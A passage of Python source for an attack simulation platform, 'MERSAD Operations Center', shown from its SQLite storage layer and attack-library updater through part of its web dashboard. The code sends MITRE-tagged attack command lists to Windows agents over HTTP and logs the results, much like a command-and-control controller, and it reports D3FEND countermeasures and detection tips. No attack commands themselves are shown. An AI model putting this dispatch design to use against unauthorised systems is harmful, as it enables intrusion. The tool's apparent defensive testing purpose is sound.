            CREATE TABLE IF NOT EXISTS attack_history (
                id INTEGER PRIMARY KEY AUTOINCREMENT,
                attack_id TEXT NOT NULL,
                attack_name TEXT NOT NULL,
                agent_id TEXT NOT NULL,
                category TEXT,
                mitre_id TEXT,
                severity TEXT,
                commands TEXT,
                success INTEGER,
                output TEXT,
                error TEXT,
                timestamp TEXT
            )
        ''')
        
        cursor.execute('''
            CREATE TABLE IF NOT EXISTS settings (
                key TEXT PRIMARY KEY,
                value TEXT
            )
        ''')
        
        conn.commit()
        conn.close()
    
    def save_agent(self, agent: Dict):
        """Save or update agent."""
        conn = sqlite3.connect(self.db_path)
        cursor = conn.cursor()
        cursor.execute('''
            INSERT OR REPLACE INTO agents (id, ip, port, hostname, platform, status, last_seen, created_at)
            VALUES (?, ?, ?, ?, ?, ?, ?, ?)
        ''', (
            agent['id'], agent['ip'], agent['port'], 
            agent.get('hostname', 'unknown'), agent.get('platform', 'windows'),
            agent.get('status', 'pending'), agent.get('last_seen'),
            agent.get('created_at', datetime.now().isoformat())
        ))
        conn.commit()
        conn.close()
    
    def get_agents(self) -> List[Dict]:
        """Get all saved agents."""
        conn = sqlite3.connect(self.db_path)
        cursor = conn.cursor()
        cursor.execute('SELECT * FROM agents')
        rows = cursor.fetchall()
        conn.close()
        
        agents = []
        for row in rows:
            agents.append({
                'id': row[0], 'ip': row[1], 'port': row[2],
                'hostname': row[3], 'platform': row[4],
                'status': row[5], 'last_seen': row[6], 'created_at': row[7]
            })
        return agents
    
    def delete_agent(self, agent_id: str):
        """Delete an agent."""
        conn = sqlite3.connect(self.db_path)
        cursor = conn.cursor()
        cursor.execute('DELETE FROM agents WHERE id = ?', (agent_id,))
        conn.commit()
        conn.close()
    
    def save_attack_result(self, result: Dict):
        """Save attack execution result."""
        conn = sqlite3.connect(self.db_path)
        cursor = conn.cursor()
        commands = json.dumps(result.get('commands', []))
        cursor.execute('''
            INSERT INTO attack_history (attack_id, attack_name, agent_id, category, mitre_id, severity, commands, success, output, error, timestamp)
            VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)
        ''', (
            result['attack_id'], result['attack_name'], result['agent_id'],
            result.get('category', ''), result.get('mitre_id', ''),
            result.get('severity', 'medium'), commands,
            1 if result.get('success') else 0,
            result.get('output', ''), result.get('error', ''),
            result.get('timestamp', datetime.now().isoformat())
        ))
        conn.commit()
        conn.close()
    
    def get_attack_history(self, limit: int = 500) -> List[Dict]:
        """Get attack history."""
        conn = sqlite3.connect(self.db_path)
        cursor = conn.cursor()
        cursor.execute('SELECT * FROM attack_history ORDER BY id DESC LIMIT ?', (limit,))
        rows = cursor.fetchall()
        conn.close()
        
        history = []
        for row in rows:
            history.append({
                'id': row[0], 'attack_id': row[1], 'attack_name': row[2],
                'agent_id': row[3], 'category': row[4], 'mitre_id': row[5],
                'severity': row[6], 'commands': json.loads(row[7]),
                'success': bool(row[8]), 'output': row[9],
                'error': row[10], 'timestamp': row[11]
            })
        return history
    
    def get_stats(self) -> Dict:
        """Get execution statistics."""
        conn = sqlite3.connect(self.db_path)
        cursor = conn.cursor()
        
        cursor.execute('SELECT COUNT(*) FROM attack_history')
        total = cursor.fetchone()[0]
        
        cursor.execute('SELECT COUNT(*) FROM attack_history WHERE success = 1')
        successful = cursor.fetchone()[0]
        
        cursor.execute('SELECT COUNT(*) FROM attack_history WHERE success = 0')
        failed = cursor.fetchone()[0]
        
        conn.close()
        
        return {
            'total_executed': total,
            'successful': successful,
            'failed': failed
        }
    
    def clear_history(self):
        """Clear attack history."""
        conn = sqlite3.connect(self.db_path)
        cursor = conn.cursor()
        cursor.execute('DELETE FROM attack_history')
        conn.commit()
        conn.close()


# ============================================================================
# UPDATE MANAGER - Modular attack library updates
# ============================================================================

class UpdateManager:
    """Manages attack library updates without replacing the entire application."""
    
    def __init__(self, base_dir: str = None):
        if base_dir is None:
            base_dir = os.path.dirname(os.path.abspath(__file__))
        self.base_dir = base_dir
        self.data_dir = os.path.join(base_dir, 'data')
        self.updates_dir = os.path.join(base_dir, 'updates')
        self.base_attacks_file = os.path.join(self.data_dir, 'attacks_base.json')
        self.custom_attacks_file = os.path.join(self.data_dir, 'attacks_custom.json')
        self.update_state_file = os.path.join(self.data_dir, 'update_state.json')
        
        self._ensure_dirs()
    
    def _ensure_dirs(self):
        """Create data directories if they don't exist."""
        os.makedirs(self.data_dir, exist_ok=True)
        os.makedirs(self.updates_dir, exist_ok=True)
    
    def load_attacks(self) -> List[Dict]:
        """Load attacks from external files with fallback to embedded."""
        attacks = []
        
        if os.path.exists(self.base_attacks_file):
            try:
                with open(self.base_attacks_file, 'r') as f:
                    data = json.load(f)
                    attacks = data.get('attacks', [])
            except Exception:
                pass
        
        if not attacks:
            attacks = EMBEDDED_ATTACKS.copy()
        
        if os.path.exists(self.custom_attacks_file):
            try:
                with open(self.custom_attacks_file, 'r') as f:
                    data = json.load(f)
                    custom = data.get('attacks', [])
                    existing_ids = {a['id'] for a in attacks}
                    for attack in custom:
                        if attack['id'] not in existing_ids:
                            attacks.append(attack)
                        else:
                            for i, a in enumerate(attacks):
                                if a['id'] == attack['id']:
                                    attacks[i] = attack
                                    break
            except Exception:
                pass
        
        return attacks
    
    def save_attacks(self, attacks: List[Dict], custom: bool = True) -> bool:
        """Save attacks to external file."""
        try:
            filepath = self.custom_attacks_file if custom else self.base_attacks_file
            with open(filepath, 'w') as f:
                json.dump({
                    'version': VERSION,
                    'count': len(attacks),
                    'updated': datetime.now().isoformat(),
                    'attacks': attacks
                }, f, indent=2)
            return True
        except Exception:
            return False
    
    def get_update_state(self) -> Dict:
        """Get current update state."""
        if os.path.exists(self.update_state_file):
            try:
                with open(self.update_state_file, 'r') as f:
                    return json.load(f)
            except Exception:
                pass
        return {
            'last_check': None,
            'base_version': VERSION,
            'updates_applied': [],
            'auto_check': True
        }
    
    def save_update_state(self, state: Dict) -> bool:
        """Save update state."""
        try:
            with open(self.update_state_file, 'w') as f:
                json.dump(state, f, indent=2)
            return True
        except Exception:
            return False
    
    def apply_update(self, new_attacks: List[Dict], source: str = "mersad") -> Dict:
        """Apply downloaded attack updates."""
        current = self.load_attacks()
        current_ids = {a['id'] for a in current}
        new_ids = {a['id'] for a in new_attacks}
        
        added = 0
        updated = 0
        
        for attack in new_attacks:
            if attack['id'] not in current_ids:
                current.append(attack)
                added += 1
            else:
                for i, a in enumerate(current):
                    if a['id'] == attack['id']:
                        current[i] = attack
                        updated += 1
                        break
        
        self.save_attacks(current, custom=True)
        
        state = self.get_update_state()
        state['last_check'] = datetime.now().isoformat()
        state['updates_applied'].append({
            'source': source,
            'timestamp': datetime.now().isoformat(),
            'added': added,
            'updated': updated
        })
        self.save_update_state(state)
        
        return {
            'success': True,
            'added': added,
            'updated': updated,
            'total': len(current)
        }


# ============================================================================
# CORE ATTACKER LOGIC - Works completely offline
# ============================================================================

class AttackerCore:
    """Core attack execution logic - fully standalone."""
    
    def __init__(self, mersad_url: str = None):
        self.mersad_url = mersad_url.rstrip('/') if mersad_url else None
        self.attacker_id = f"kali-{socket.gethostname()}-{datetime.now().strftime('%H%M')}"
        self.local_ip = self._get_local_ip()
        self.db = LocalDatabase()
        self.update_manager = UpdateManager()
        self.attacks = self.update_manager.load_attacks()
        self.session_start = datetime.now().isoformat()
        self.online_mode = False
        
        self._load_saved_agents()
    
    def _get_local_ip(self) -> str:
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            s.connect(("8.8.8.8", 80))
            ip = s.getsockname()[0]
            s.close()
            return ip
        except:
            return "127.0.0.1"
    
    def _load_saved_agents(self):
        """Load previously saved agents from database."""
        self.agents = {}
        for agent in self.db.get_agents():
            self.agents[agent['id']] = agent
    
    @property
    def stats(self) -> Dict:
        """Get current stats from database."""
        return self.db.get_stats()
    
    @property
    def attack_history(self) -> List[Dict]:
        """Get attack history from database."""
        return self.db.get_attack_history()
    
    def check_for_updates(self) -> Dict:
        """Optional: Check MERSAD website for attack library updates."""
        if not self.mersad_url:
            return {'success': False, 'error': 'No MERSAD URL configured. Run with --mersad URL to enable updates.'}
        
        try:
            url = f"{self.mersad_url}/api/attacks/windows"
            req = urllib.request.Request(url, method='GET')
            with urllib.request.urlopen(req, timeout=10) as response:
                result = json.loads(response.read().decode('utf-8'))
                if result.get('success') and result.get('attacks'):
                    new_attacks = result['attacks']
                    current_ids = {a['id'] for a in self.attacks}
                    new_ids = {a['id'] for a in new_attacks}
                    
                    added = len(new_ids - current_ids)
                    if added > 0:
                        update_result = self.update_manager.apply_update(new_attacks)
                        self.attacks = self.update_manager.load_attacks()
                        return {
                            'success': True, 
                            'message': f'Updated! Added {update_result["added"]} new attacks, updated {update_result["updated"]}',
                            'total': len(self.attacks),
                            'saved_locally': True
                        }
                    return {'success': True, 'message': 'Already up to date', 'total': len(self.attacks)}
                return {'success': False, 'error': 'Invalid response'}
        except Exception as e:
            return {'success': False, 'error': str(e)}
    
    def get_update_state(self) -> Dict:
        """Get the current update state."""
        state = self.update_manager.get_update_state()
        state['attack_count'] = len(self.attacks)
        state['mersad_url'] = self.mersad_url
        return state
    
    def reload_attacks(self) -> Dict:
        """Reload attacks from external files."""
        self.attacks = self.update_manager.load_attacks()
        return {'success': True, 'count': len(self.attacks)}
    
    def check_version_update(self) -> Dict:
        """Check MERSAD website for version updates."""
        if not self.mersad_url:
            return {'success': False, 'error': 'No MERSAD URL configured', 'update_available': False}
        
        try:
            url = f"{self.mersad_url}/api/updates/check/kali_attacker_ui?version={VERSION}"
            req = urllib.request.Request(url, method='GET')
            with urllib.request.urlopen(req, timeout=10) as response:
                result = json.loads(response.read().decode('utf-8'))
                return result
        except Exception as e:
            return {'success': False, 'error': str(e), 'update_available': False}
    
    def download_update(self) -> Dict:
        """Download the latest version from MERSAD website."""
        if not self.mersad_url:
            return {'success': False, 'error': 'No MERSAD URL configured'}
        
        try:
            url = f"{self.mersad_url}/download/attacker/linux-ui"
            req = urllib.request.Request(url, method='GET')
            with urllib.request.urlopen(req, timeout=30) as response:
                content = response.read()
                
                download_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'kali_attacker_ui_new.py')
                with open(download_path, 'wb') as f:
                    f.write(content)
                
                return {
                    'success': True,
                    'message': f'Update downloaded to {download_path}',
                    'path': download_path,
                    'instructions': 'Replace the current script with the downloaded file and restart.'
                }
        except Exception as e:
            return {'success': False, 'error': str(e)}
    
    def test_agent(self, ip: str, port: int = 8888) -> Dict:
        """Test connection to a Windows agent."""
        agent_id = f"{ip}:{port}"
        try:
            url = f"http://{ip}:{port}/status"
            req = urllib.request.Request(url, method='GET')
            with urllib.request.urlopen(req, timeout=10) as response:
                result = json.loads(response.read().decode('utf-8'))
                agent = {
                    'id': agent_id,
                    'ip': ip,
                    'port': port,
                    'status': 'online',
                    'hostname': result.get('hostname', 'unknown'),
                    'platform': result.get('platform', 'windows'),
                    'last_seen': datetime.now().isoformat(),
                    'created_at': self.agents.get(agent_id, {}).get('created_at', datetime.now().isoformat())
                }
                self.agents[agent_id] = agent
                self.db.save_agent(agent)
                return {'success': True, 'agent': agent}
        except Exception as e:
            if agent_id in self.agents:
                self.agents[agent_id]['status'] = 'offline'
                self.db.save_agent(self.agents[agent_id])
            return {'success': False, 'error': str(e)}
    
    def add_agent(self, ip: str, port: int = 8888) -> Dict:
        """Add a new Windows agent."""
        agent_id = f"{ip}:{port}"
        agent = {
            'id': agent_id,
            'ip': ip,
            'port': port,
            'status': 'pending',
            'hostname': 'unknown',
            'platform': 'windows',
            'last_seen': None,
            'created_at': datetime.now().isoformat()
        }
        self.agents[agent_id] = agent
        self.db.save_agent(agent)
        return self.test_agent(ip, port)
    
    def remove_agent(self, agent_id: str) -> Dict:
        """Remove an agent."""
        if agent_id in self.agents:
            del self.agents[agent_id]
            self.db.delete_agent(agent_id)
            return {'success': True}
        return {'success': False, 'error': 'Agent not found'}
    
    def execute_attack(self, agent_id: str, attack_id: str) -> Dict:
        """Execute an attack on a target agent."""
        if agent_id not in self.agents:
            return {'success': False, 'error': 'Agent not found'}
        
        attack = next((a for a in self.attacks if a['id'] == attack_id), None)
        if not attack:
            return {'success': False, 'error': 'Attack not found'}
        
        agent = self.agents[agent_id]
        try:
            url = f"http://{agent['ip']}:{agent['port']}/execute"
            payload = {
                'attack_id': attack['id'],
                'attack_config': {
                    'name': attack.get('name', ''),
                    'category': attack.get('category', ''),
                    'mitre_id': attack.get('mitre_id', ''),
                    'commands': attack.get('commands', [])
                }
            }
            req = urllib.request.Request(
                url,
                data=json.dumps(payload).encode('utf-8'),
                headers={'Content-Type': 'application/json'},
                method='POST'
            )
            with urllib.request.urlopen(req, timeout=60) as response:
                result = json.loads(response.read().decode('utf-8'))
                
                history_entry = {
                    'attack_id': attack['id'],
                    'attack_name': attack['name'],
                    'agent_id': agent_id,
                    'category': attack.get('category', ''),
                    'mitre_id': attack.get('mitre_id', ''),
                    'severity': attack.get('severity', 'medium'),
                    'commands': attack.get('commands', []),
                    'success': result.get('success', False),
                    'output': result.get('output', ''),
                    'error': result.get('error', ''),
                    'timestamp': datetime.now().isoformat()
                }
                self.db.save_attack_result(history_entry)
                
                return {
                    'success': True,
                    'result': result,
                    'attack': attack,
                    'history_entry': history_entry
                }
        except Exception as e:
            history_entry = {
                'attack_id': attack['id'],
                'attack_name': attack['name'],
                'agent_id': agent_id,
                'category': attack.get('category', ''),
                'mitre_id': attack.get('mitre_id', ''),
                'severity': attack.get('severity', 'medium'),
                'commands': attack.get('commands', []),
                'success': False,
                'output': '',
                'error': str(e),
                'timestamp': datetime.now().isoformat()
            }
            self.db.save_attack_result(history_entry)
            return {'success': False, 'error': str(e)}
    
    def get_categories(self) -> List[str]:
        """Get all attack categories."""
        return sorted(list(set(a.get('category', 'Other') for a in self.attacks)))
    
    def get_attacks_by_category(self, category: str) -> List[Dict]:
        """Get attacks filtered by category."""
        if category == 'All':
            return self.attacks
        return [a for a in self.attacks if a.get('category') == category]
    
    def export_csv(self) -> str:
        """Export attack history to CSV with full security details."""
        lines = ['Timestamp,Attack ID,Attack Name,Target,Category,MITRE ID,Tactic,Severity,Status,Commands,D3FEND Countermeasures,Detection Tips,Prevention Tips,Remediation Tips,Error']
        for h in self.attack_history:
            status = 'Success' if h.get('success') else 'Failed'
            error = h.get('error', '').replace('"', '""').replace('\n', ' ')
            
            # Get attack details for D3FEND and defensive recommendations
            attack = next((a for a in self.attacks if a['id'] == h.get('attack_id')), {})
            commands = '; '.join(h.get('commands', [])).replace('"', '""')
            d3fend = '; '.join(attack.get('d3fend', [])).replace('"', '""')
            detection = attack.get('detection', '').replace('"', '""')
            prevention = attack.get('prevention', '').replace('"', '""')
            remediation = attack.get('remediation', '').replace('"', '""')
            tactic = attack.get('tactic', h.get('category', ''))
            
            lines.append(f'"{h.get("timestamp","")}","{h.get("attack_id","")}","{h.get("attack_name","")}","{h.get("agent_id","")}","{h.get("category","")}","{h.get("mitre_id","")}","{tactic}","{h.get("severity","")}","{status}","{commands}","{d3fend}","{detection}","{prevention}","{remediation}","{error}"')
        return '\n'.join(lines)
    
    def clear_history(self):
        """Clear all attack history."""
        self.db.clear_history()
    
    def receive_sync(self, results: List[Dict], agent_id: str) -> int:
        """Receive sync data from Windows agent and store in history."""
        count = 0
        for result in results:
            outputs = result.get('outputs', [])
            errors = result.get('errors', [])
            
            output_text = ""
            for out in outputs:
                if isinstance(out, dict):
                    output_text += f"Command: {out.get('command', '')}\n"
                    if out.get('stdout'):
                        output_text += f"Output: {out['stdout']}\n"
                    if out.get('stderr'):
                        output_text += f"Error: {out['stderr']}\n"
            
            error_text = ""
            for err in errors:
                if isinstance(err, dict):
                    error_text += f"{err.get('command', '')}: {err.get('error', '')}\n"
                else:
                    error_text += str(err) + "\n"
            
            history_entry = {
                'attack_id': result.get('attack_id', ''),
                'attack_name': result.get('name', ''),
                'agent_id': agent_id,
                'category': result.get('category', ''),
                'mitre_id': result.get('mitre_id', ''),
                'severity': 'medium',
                'commands': [],
                'success': result.get('success', False),
                'output': output_text.strip(),
                'error': error_text.strip(),
                'timestamp': result.get('timestamp', datetime.now().isoformat()),
                'synced_from_agent': True
            }
            self.db.save_attack_result(history_entry)
            count += 1
        return count


# ============================================================================
# STATE HOLDER
# ============================================================================

class AttackerState:
    """Shared state holder for the attacker."""
    core: Optional[AttackerCore] = None

attacker_state = AttackerState()


# ============================================================================
# WEB UI TEMPLATE
# ============================================================================

HTML_TEMPLATE = '''<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>MERSAD - Kali Operations Center</title>
    <script src="https://cdn.jsdelivr.net/npm/chart.js"></script>
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Cairo:wght@700&family=Orbitron:wght@700&display=swap');
        * { box-sizing: border-box; margin: 0; padding: 0; }
        body {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            background: linear-gradient(135deg, #0a0a1a 0%, #1a1a2e 50%, #0f3460 100%);
            color: #e4e4e4;
            min-height: 100vh;
        }
        .container { max-width: 1600px; margin: 0 auto; padding: 20px; }
        header {
            display: flex;
            justify-content: space-between;
            align-items: center;
            padding: 20px 0;
            border-bottom: 1px solid rgba(255,255,255,0.1);
            margin-bottom: 20px;
        }
        .header-left h1 {
            font-family: 'Orbitron', sans-serif;
            background: linear-gradient(135deg, #00d4ff 0%, #8a2eff 50%, #ff6b6b 100%);
            -webkit-background-clip: text;
            -webkit-text-fill-color: transparent;
            font-size: 1.8rem;
            margin-bottom: 5px;
        }
        .header-arabic {
            font-family: 'Cairo', sans-serif;
            font-size: 1.2rem;
            background: linear-gradient(135deg, #ff6b6b 0%, #8a2eff 100%);
            -webkit-background-clip: text;
            -webkit-text-fill-color: transparent;
        }
        .header-left p { color: #888; font-size: 0.85rem; }
        .connection-info {
            display: flex;
            gap: 20px;
            align-items: center;
        }
        .mode-badge {
            padding: 8px 16px;
            border-radius: 20px;
            font-size: 0.85rem;
            font-weight: 600;
        }
        .mode-badge.offline {
            background: rgba(76,175,80,0.15);
            border: 1px solid rgba(76,175,80,0.3);
            color: #4caf50;
        }
        .mode-badge.online {
            background: rgba(0,212,255,0.15);
            border: 1px solid rgba(0,212,255,0.3);
            color: #00d4ff;
        }
        .update-btn {
            background: rgba(255,255,255,0.05);
            border: 1px solid rgba(255,255,255,0.1);
            color: #888;
            padding: 8px 16px;
            border-radius: 6px;
            cursor: pointer;
            font-size: 0.85rem;
            transition: all 0.3s;
        }
        .update-btn:hover {
            background: rgba(0,212,255,0.1);
            border-color: #00d4ff;
            color: #00d4ff;
        }
        
        /* Metrics Dashboard */
        .metrics-grid {
            display: grid;
            grid-template-columns: repeat(auto-fit, minmax(180px, 1fr));
            gap: 20px;
            margin-bottom: 25px;
        }
        .metric-card {
            background: rgba(255,255,255,0.03);
            border-radius: 12px;
            padding: 20px;
            border: 1px solid rgba(255,255,255,0.05);
            position: relative;
            overflow: hidden;
        }
        .metric-card::before {
            content: '';
            position: absolute;
            left: 0;
            top: 0;
            bottom: 0;
            width: 4px;
        }
        .metric-card.primary::before { background: #00d4ff; }
        .metric-card.success::before { background: #4caf50; }
        .metric-card.danger::before { background: #ff6b6b; }
        .metric-card.warning::before { background: #ffa500; }
        .metric-card.info::before { background: #9c27b0; }
        .metric-value {
            font-size: 2.5rem;
            font-weight: 700;
            display: block;
            margin-bottom: 5px;
        }
        .metric-card.primary .metric-value { color: #00d4ff; }
        .metric-card.success .metric-value { color: #4caf50; }
        .metric-card.danger .metric-value { color: #ff6b6b; }
        .metric-card.warning .metric-value { color: #ffa500; }
        .metric-card.info .metric-value { color: #9c27b0; }
        .metric-label {
            font-size: 0.8rem;
            color: #888;
            text-transform: uppercase;
            letter-spacing: 0.5px;
        }
        
        /* Tabs */
        .tabs {
            display: flex;
            gap: 5px;
            margin-bottom: 25px;
            border-bottom: 1px solid rgba(255,255,255,0.1);
            padding-bottom: 10px;
            flex-wrap: wrap;
        }
        .tab-btn {
            background: transparent;
            border: none;
            color: #888;
            padding: 12px 24px;
            cursor: pointer;
            border-radius: 8px 8px 0 0;
            transition: all 0.3s;
            font-size: 0.95rem;
            font-weight: 500;
        }
        .tab-btn:hover { background: rgba(255,255,255,0.05); color: #fff; }
        .tab-btn.active {
            background: linear-gradient(135deg, rgba(0,212,255,0.15) 0%, rgba(255,107,107,0.1) 100%);
            color: #00d4ff;
            border-bottom: 2px solid #00d4ff;
        }
        .tab-content { display: none; }
        .tab-content.active { display: block; }
        
        /* Cards */
        .card {
            background: rgba(255,255,255,0.03);
            border-radius: 12px;
            padding: 25px;
            margin-bottom: 25px;
            border: 1px solid rgba(255,255,255,0.05);
        }
        .card-header {
            display: flex;
            justify-content: space-between;
            align-items: center;
            margin-bottom: 20px;
        }
        .card h3 {
            color: #00d4ff;
            font-size: 1.1rem;
        }
        
        /* Buttons */
        .btn {
            background: linear-gradient(135deg, #00d4ff 0%, #0099cc 100%);
            border: none;
            color: #fff;
            padding: 10px 20px;
            border-radius: 6px;
            cursor: pointer;
            font-weight: 600;
            transition: all 0.3s;
            display: inline-flex;
            align-items: center;
            gap: 8px;
        }
        .btn:hover { transform: translateY(-2px); box-shadow: 0 4px 15px rgba(0,212,255,0.3); }
        .btn-success { background: linear-gradient(135deg, #4caf50 0%, #388e3c 100%); }
        .btn-danger { background: linear-gradient(135deg, #ff6b6b 0%, #cc5555 100%); }
        .btn-secondary { background: rgba(255,255,255,0.1); }
        .btn-sm { padding: 6px 12px; font-size: 0.85rem; }
        .btn-xs { padding: 4px 8px; font-size: 0.75rem; }
        
        /* Forms */
        input, select {
            background: rgba(0,0,0,0.3);
            border: 1px solid rgba(255,255,255,0.1);
            color: #fff;
            padding: 10px 15px;
            border-radius: 6px;
            width: 100%;
        }
        input:focus, select:focus {
            outline: none;
            border-color: #00d4ff;
        }
        input::placeholder { color: #666; }
        .form-group { margin-bottom: 15px; }
        .form-group label {
            display: block;
            margin-bottom: 5px;
            color: #888;
            font-size: 0.85rem;
        }
        .form-row { display: flex; gap: 15px; }
        .form-row .form-group { flex: 1; }
        
        /* Agent List */
        .agent-list { display: flex; flex-direction: column; gap: 10px; }
        .agent-item {
            display: flex;
            align-items: center;
            gap: 15px;
            padding: 15px;
            background: rgba(0,0,0,0.2);
            border-radius: 8px;
            border: 1px solid rgba(255,255,255,0.05);
        }
        .agent-status {
            width: 12px;
            height: 12px;
            border-radius: 50%;
            background: #666;
        }
        .agent-status.online { background: #4caf50; box-shadow: 0 0 10px rgba(76,175,80,0.5); }
        .agent-status.offline { background: #ff6b6b; }
        .agent-status.pending { background: #ffa500; }
        .agent-info { flex: 1; }
        .agent-name { font-weight: 600; }
        .agent-detail { font-size: 0.85rem; color: #888; }
        
        /* Attack Grid */
        .attack-grid {
            display: grid;
            grid-template-columns: repeat(auto-fill, minmax(280px, 1fr));
            gap: 15px;
        }
        .attack-card {
            background: rgba(0,0,0,0.2);
            border-radius: 8px;
            padding: 15px;
            border: 1px solid rgba(255,255,255,0.05);
            cursor: pointer;
            transition: all 0.3s;
        }
        .attack-card:hover {
            border-color: #00d4ff;
            transform: translateY(-2px);
        }
        .attack-card.selected {
            border-color: #4caf50;
            background: rgba(76, 175, 80, 0.1);
        }
        .attack-card h4 { margin-bottom: 8px; font-size: 0.95rem; }
        .attack-card .desc {
            color: #888;
            font-size: 0.8rem;
            margin-bottom: 10px;
            display: -webkit-box;
            -webkit-line-clamp: 2;
            -webkit-box-orient: vertical;
            overflow: hidden;
        }
        .attack-card .meta {
            display: flex;
            gap: 8px;
            flex-wrap: wrap;
        }
        .tag {
            padding: 3px 8px;
            border-radius: 4px;
            font-size: 0.7rem;
            font-weight: 500;
        }
        .tag.category { background: rgba(0,212,255,0.15); color: #00d4ff; }
        .tag.mitre { background: rgba(156,39,176,0.15); color: #ce93d8; }
        .tag.severity-low { background: rgba(76,175,80,0.15); color: #4caf50; }
        .tag.severity-medium { background: rgba(255,165,0,0.15); color: #ffa500; }
        .tag.severity-high { background: rgba(255,107,107,0.15); color: #ff6b6b; }
        .tag.severity-critical { background: rgba(156,39,176,0.2); color: #ce93d8; }
        
        /* Category Filter */
        .category-filter {
            display: flex;
            gap: 8px;
            flex-wrap: wrap;
            margin-bottom: 20px;
        }
        .category-btn {
            background: rgba(255,255,255,0.05);
            border: 1px solid rgba(255,255,255,0.1);
            color: #888;
            padding: 8px 16px;
            border-radius: 20px;
            cursor: pointer;
            transition: all 0.3s;
            font-size: 0.85rem;
        }
        .category-btn:hover, .category-btn.active {
            background: rgba(0,212,255,0.15);
            border-color: #00d4ff;
            color: #00d4ff;
        }
        
        /* History Table */
        .history-table {
            width: 100%;
            border-collapse: collapse;
        }
        .history-table th, .history-table td {
            padding: 12px;
            text-align: left;
            border-bottom: 1px solid rgba(255,255,255,0.05);
        }
        .history-table th {
            color: #888;
            font-weight: 500;
            font-size: 0.85rem;
            text-transform: uppercase;
        }
        .history-table tr:hover { background: rgba(255,255,255,0.02); }
        .status-badge {
            padding: 4px 10px;
            border-radius: 12px;
            font-size: 0.75rem;
            font-weight: 600;
        }
        .status-badge.success { background: rgba(76,175,80,0.2); color: #4caf50; }
        .status-badge.failed { background: rgba(255,107,107,0.2); color: #ff6b6b; }
        
        /* Charts */
        .charts-grid {
            display: grid;
            grid-template-columns: repeat(auto-fit, minmax(350px, 1fr));
            gap: 25px;
        }
        .chart-container {
            background: rgba(0,0,0,0.2);
            border-radius: 10px;
            padding: 20px;
        }
        .chart-container h4 {
            margin-bottom: 15px;
            color: #888;
            font-size: 0.9rem;
        }
        
        /* Empty state */
        .empty-state {
            text-align: center;
            padding: 60px 20px;
            color: #666;
        }
        .empty-state h4 { color: #888; margin-bottom: 10px; }
        
        /* Toast */
        .toast {
            position: fixed;
            bottom: 20px;
            right: 20px;
            padding: 15px 25px;
            border-radius: 8px;
            background: #333;
            color: #fff;
            z-index: 1000;
            animation: slideIn 0.3s ease;
        }
        .toast.success { background: #4caf50; }
        .toast.error { background: #ff6b6b; }
        @keyframes slideIn {
            from { transform: translateX(100%); opacity: 0; }
            to { transform: translateX(0); opacity: 1; }
        }
        
        /* Search and filter */
        .search-bar {
            display: flex;
            gap: 15px;
            margin-bottom: 20px;
            flex-wrap: wrap;
        }
        .search-bar input { max-width: 300px; }
        .search-bar select { max-width: 200px; }
        
        /* Pagination */
        .pagination {
            display: flex;
            gap: 5px;
            justify-content: center;
            margin-top: 20px;
        }
        .pagination button {
            background: rgba(255,255,255,0.05);
            border: 1px solid rgba(255,255,255,0.1);
            color: #888;
            padding: 8px 14px;
            border-radius: 4px;
            cursor: pointer;
        }
        .pagination button.active {
            background: #00d4ff;
            border-color: #00d4ff;
            color: #000;
        }
        .pagination button:hover:not(.active) {
            background: rgba(255,255,255,0.1);
        }
    </style>
</head>
<body>
    <div class="container">
        <header>
            <div class="header-left">
                <span class="header-arabic">مرصاد</span>
                <h1>MERSAD Operations Center</h1>
                <p>Standalone Attack Simulation Platform</p>
            </div>
            <div class="connection-info">
                <span class="mode-badge offline" id="modeBadge">OFFLINE MODE</span>
                <button class="update-btn" onclick="checkForUpdates()">Check for Updates</button>
            </div>
        </header>
        
        <!-- Metrics -->
        <div class="metrics-grid">
            <div class="metric-card primary">
                <span class="metric-value" id="metricAttacks">0</span>
                <span class="metric-label">Attack Library</span>
            </div>
            <div class="metric-card info">
                <span class="metric-value" id="metricExecuted">0</span>
                <span class="metric-label">Executed</span>
            </div>
            <div class="metric-card success">
                <span class="metric-value" id="metricSuccess">0</span>
                <span class="metric-label">Successful</span>
            </div>
            <div class="metric-card danger">
                <span class="metric-value" id="metricFailed">0</span>
                <span class="metric-label">Failed</span>
            </div>
            <div class="metric-card warning">
                <span class="metric-value" id="metricAgents">0</span>
                <span class="metric-label">Agents</span>
            </div>
            <div class="metric-card primary">
                <span class="metric-value" id="metricRate">0%</span>
                <span class="metric-label">Success Rate</span>
            </div>
        </div>
        
        <!-- Tabs -->
        <div class="tabs">
            <button class="tab-btn active" onclick="showTab('dashboard')">Dashboard</button>
            <button class="tab-btn" onclick="showTab('agents')">Agents</button>
            <button class="tab-btn" onclick="showTab('library')">Attack Library</button>
            <button class="tab-btn" onclick="showTab('execute')">Execute</button>
            <button class="tab-btn" onclick="showTab('history')">History</button>
            <button class="tab-btn" onclick="showTab('reports')">Reports</button>
            <button class="tab-btn" onclick="showTab('about')">About</button>
        </div>
        
        <!-- Dashboard Tab -->
        <div id="tab-dashboard" class="tab-content active">
            <div class="charts-grid">
                <div class="chart-container">
                    <h4>Attacks by Category</h4>
                    <canvas id="categoryChart"></canvas>
                </div>
                <div class="chart-container">
                    <h4>Success Rate</h4>
                    <canvas id="successChart"></canvas>
                </div>
            </div>
            
            <div class="card" style="margin-top: 25px;">
                <h3>Recent Activity</h3>
                <div id="recentActivity" class="agent-list" style="margin-top: 15px;">
                    <div class="empty-state">
                        <h4>No activity yet</h4>
                        <p>Execute some attacks to see activity here</p>
                    </div>
                </div>
            </div>
        </div>
        
        <!-- Agents Tab -->
        <div id="tab-agents" class="tab-content">
            <div class="card">
                <div class="card-header">
                    <h3>Add Windows Agent</h3>
                </div>
                <div class="form-row">
                    <div class="form-group">
                        <label>IP Address</label>
                        <input type="text" id="agentIp" placeholder="192.168.1.100">
                    </div>
                    <div class="form-group">
                        <label>Port</label>
                        <input type="number" id="agentPort" value="8888">
                    </div>
                    <div class="form-group" style="display: flex; align-items: flex-end;">
                        <button class="btn" onclick="addAgent()">Add Agent</button>
                    </div>
                </div>
            </div>
            
            <div class="card">
                <div class="card-header">
                    <h3>Registered Agents</h3>
                    <button class="btn btn-sm btn-secondary" onclick="refreshAgents()">Refresh All</button>
